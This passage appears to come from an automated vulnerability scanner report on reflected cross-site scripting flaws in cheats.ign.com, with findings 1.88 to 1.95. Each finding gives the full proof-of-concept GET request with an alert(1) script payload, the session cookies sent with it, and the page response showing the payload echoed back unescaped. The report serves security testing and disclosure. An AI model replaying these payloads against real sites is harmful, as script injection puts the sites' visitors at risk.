MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:04 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 145534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
= 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/playstation-3-cheats/index.html?5fc63"-alert(1)-"d1160877f7c=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.88. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-portable-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b2f8"><script>alert(1)</script>a0f6b4d3eae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/playstation-portable-cheats/index.html?7b2f8"><script>alert(1)</script>a0f6b4d3eae=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:05 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 133883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/playstation-portable-cheats/index.html?7b2f8"><script>alert(1)</script>a0f6b4d3eae=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.89. http://cheats.ign.com/index/playstation-portable-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/playstation-portable-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7eda0"-alert(1)-"f4bf6d7729 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/playstation-portable-cheats/index.html?7eda0"-alert(1)-"f4bf6d7729=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:08 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 133819

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
fined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/playstation-portable-cheats/index.html?7eda0"-alert(1)-"f4bf6d7729=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.90. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/wii-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57ac0"-alert(1)-"3c9c5074ccb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/wii-cheats/index.html?57ac0"-alert(1)-"3c9c5074ccb=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:58 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143107

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
oreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/wii-cheats/index.html?57ac0"-alert(1)-"3c9c5074ccb=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.91. http://cheats.ign.com/index/wii-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/wii-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a851c"><script>alert(1)</script>1a568c9cf90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/wii-cheats/index.html?a851c"><script>alert(1)</script>1a568c9cf90=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:55 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 143168

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/wii-cheats/index.html?a851c"><script>alert(1)</script>1a568c9cf90=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.92. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/xbox-360-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 342f5"><script>alert(1)</script>f6da6f90a8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index/xbox-360-cheats/index.html?342f5"><script>alert(1)</script>f6da6f90a8e=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:56 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 151239

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000068&c3=&c4=http://cheats.ign.com/index/xbox-360-cheats/index.html?342f5"><script>alert(1)</script>f6da6f90a8e=1&c5=&c6=&c15=C67BD3C1&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
...[SNIP]...

1.93. http://cheats.ign.com/index/xbox-360-cheats/index.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /index/xbox-360-cheats/index.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b10a4"-alert(1)-"ad4092dec39 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /index/xbox-360-cheats/index.html?b10a4"-alert(1)-"ad4092dec39=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:12:59 GMT
Server: Jetty/5.1.10 (Linux/2.6.18-164.6.1.el5 amd64 java/1.6.0_13
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 151267

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- /* AD from: http://ssa.ign.co
...[SNIP]...
ard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/index/xbox-360-cheats/index.html?b10a4"-alert(1)-"ad4092dec39=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.94. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/001/001317.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29999"-alert(1)-"ace275002aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ob2/068/001/001317.html?29999"-alert(1)-"ace275002aa=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _br_uid_1=uid%3D6931773698889%3A; s_sess=%20s_cc%3Dtrue%3B%20s_v13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_c13%3Dwww.ign.com%253Acheats.ign.com%3B%20s_sq%3Dignignus%253D%252526pid%25253Dign%2525253Aign%2525253Ahub%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//my.ign.com/register%2525253Fr%2525253Dhttp%2525253A//www.ign.com/%252526ot%25253DA%3B; __utmz=173446715.1297040497.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/2|utmcmd=referral; freq=c-1297040326761v-1n-12mc+1297040326761mv+1mn+12wwe~0; i18n-cc=US; optimizelyEndUserId=oeu1297040486304r0.669825860997662; optimizelyBuckets=%7B%224875108%22%3A4948008%7D; rsi_segs=; s_pers=%20s_nr%3D1297040542541%7C1299632542541%3B%20s_lv%3D1297040542542%7C1391648542542%3B%20s_lv_s%3DFirst%2520Visit%7C1297042342542%3B; decc=US; NGUserID=a016c09-18740-885768600-2; MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=0&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==; s_vi=[CS]v1|26A7A237050791B4-40000100A0002F6F[CE]; __utma=173446715.1624600188.1297040497.1297040497.1297040497.1; ATA=ign.129704044868759.173.193.214.243; __utmc=173446715; __utmb=173446715.1.10.1297040497;

Response

HTTP/1.1 200 OK
Date: Mon, 07 Feb 2011 01:13:19 GMT
Pragma: no-cache
Cache-Control: must-revalidate,no-cache,no-store
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Set-Cookie: freq=c-1297040326761v-2n-12mc+1297040326761mv+2mn+12wwe~0;Path=/;Domain=.ign.com
Content-Length: 110056

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
   <base target="_top"></bas
...[SNIP]...
omscoreGuard == 'undefined') {
       COMSCORE.beacon({
        c1:2,
        c2:"3000068",
        c3:"",
        c4:"http://cheats.ign.com/ob2/068/001/001317.html?29999"-alert(1)-"ace275002aa=1",
        c5:"",
        c6:"",
        c15:"" });
       var _comscoreGuard = new Object();
   }
</script>
...[SNIP]...

1.95. http://cheats.ign.com/ob2/068/001/001317.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cheats.ign.com
Path:   /ob2/068/001/001317.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 645d7"><script>alert(1)</script>76338fa888c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ob2/068/001/001317.html?645d7"><script>alert(1)</script>76338fa888c=1 HTTP/1.1
Host: cheats.ign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
